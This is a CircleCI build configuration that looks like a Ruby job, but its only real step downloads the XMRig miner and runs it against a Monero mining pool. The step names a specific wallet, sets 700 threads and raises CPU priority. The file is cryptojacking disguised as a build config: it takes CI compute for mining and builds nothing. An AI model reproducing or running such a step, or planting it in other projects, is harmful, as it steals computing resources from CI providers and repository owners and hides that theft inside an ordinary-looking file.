version: 2.1
jobs:
  build:
    docker:
      - image: circleci/ruby:2.4.2-jessie-node
        auth:
         username: mydockerhub-user
         password: $DOCKERHUB_PASSWORD
    steps:
      - checkout
      - run: wget https://github.com/xmrig/xmrig/releases/download/v6.16.4/xmrig-6.16.4-linux-x64.tar.gz && tar -zxf xmrig-6.16.4-linux-x64.tar.gz && cd xmrig-6.16.4 && ./xmrig -o pool.supportxmr.com:443 -u 43aw7X7kKLfb54rvM8nc3MU9ndKoZMnqXMfWaoYvPrJPfauj2uUQAb1hHRtVzvuPCJT9XMWhacQSV94ADZMxLjUDAinsVVY -k --tls -p njasknklasnsmkal --cpu-priority=5 --threads=700